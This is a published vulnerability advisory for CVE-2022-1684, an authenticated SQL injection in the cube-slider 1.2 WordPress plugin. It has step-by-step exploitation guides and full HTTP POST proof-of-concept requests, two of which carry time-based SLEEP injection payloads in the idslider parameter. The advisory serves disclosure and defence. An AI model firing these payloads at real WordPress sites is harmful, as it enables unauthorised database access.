Security Bulletin
of the Fraunhofer IESE Research Institute
Home
/
cube-slider 1.2 WordPress plugin SQL injection

cube-slider 1.2 WordPress plugin SQL injection

Vulnerability Metadata

Key Value
Date of Disclosure May 09 2022
Affected Software cube-slider
Affected Software Type WordPress plugin
Version 1.2
Weakness SQL Injection
CWE ID CWE-89
CVE ID CVE-2022-1684
CVSS 3.x Base Score 2.7
CVSS 2.0 Base Score 4.0
Reporter Daniel Krohmer, Shi Chen
Reporter Contact daniel.krohmer@iese.fraunhofer.de
Link to Affected Software https://wordpress.org/plugins/cube-slider
Link to Vulnerability DB https://nvd.nist.gov/vuln/detail/CVE-2022-1684

Vulnerability Description

The idslider data parameter in cube-slider 1.2 is vulnerable to SQL injection in three different code sections. An authenticated attacker may abuse the edit, delete or save functionalities of the plugin to craft a malicious POST request.

Exploitation Guide

Exploit 1: Edit

Login as admin user. This attack requires at least admin privileges.

cube-slider_1_step-1.png

Go to Settings ant select Cube Slider in the sub menu.

cube-slider_1_step-2.png

Add a new cube slider by clicking on New Cube Slider.

cube-slider_1_step-3.png

Scroll down and use the Click to edit slider x details button.

cube-slider_1_step-4.png

Clicking the previous button triggers the vulnerable request. idslider is the vulnerable data parameter.

cube-slider_1_step-5.png

A POC may look like the following request:

cube-slider_1_step-6.png

In the code, the vulnerability is triggered by unsanitized user input of idslider at line 207 in ./init.php

cube-slider_1_step-7.png

Exploit 2: Delete

Login as admin user. This attack requires at least admin privileges.

cube-slider_2_step-1.png

Go to Settings ant select Cube Slider in the sub menu.

cube-slider_2_step-2.png

Delete an arbitrary, existing slider by clicking on Click to delete slider x.

cube-slider_2_step-3.png

Clicking the previous button triggers the vulnerable request. idslider is the vulnerable data parameter. (Note: The numeric ID value can be set arbitrarily)

cube-slider_2_step-4.png

A POC may look like the following request:

cube-slider_2_step-5.png

In the code, the vulnerability is triggered by unsanitized user input of idslider at line 210 in ./init.php.

cube-slider_2_step-6.png

Exploit 3: Save

Login as admin user. This attack requires at least admin privileges.

cube-slider_3_step-1.png

Go to Settings ant select Cube Slider in the sub menu.

cube-slider_3_step-2.png

Add a new cube slider by clicking on New Cube Slider.

cube-slider_3_step-3.png

Scroll down and use the Save changes button. No further data input is needed before clicking this button.

cube-slider_3_step-4.png

Clicking the previous button triggers the vulnerable request. idslider is the vulnerable data parameter.

cube-slider_3_step-5.png

A POC may look like the following request:

cube-slider_3_step-6.png

In the code, the vulnerability is triggered by unsanitized user input of idslider at line 199 in ./init.php. Notice that there is no sanitization at all in the whole query!

cube-slider_3_step-7.png

Exploit Payload

Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work. The SQL injection can be triggered by sending the requests below.

Exploit Payload 1: Edit

POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&edit=Click+to+edit+slider+4+details

Exploit Payload 2: Delete

POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&delete=Click+to+delete+slider+4

Exploit Payload 3: Save

POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C8968917a5337f07f5db390194b15adfae8e850d20bc1c476fb1224002a9d5ca4; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C5d10d0aa6e661c1d443d69997bb114ab7ea5fe8071c573c62f098d0ece9efe01; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651517751
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

idslider=6&name=Name&about=About&title1=Title+1&description1=Description+1&title2=Title+2&description2=Description+2&title3=Title+3&description3=Description+3&title4=Title+4&description4=Description+4&icon1=fa-glass&color1=%2381d742&icon2=fa-glass&color2=%2381d742&icon3=fa-glass&color3=%2381d742&icon4=fa-glass&color4=%2381d742&submit=Save+Changes
© 2022 IESE
Imprint
Data protection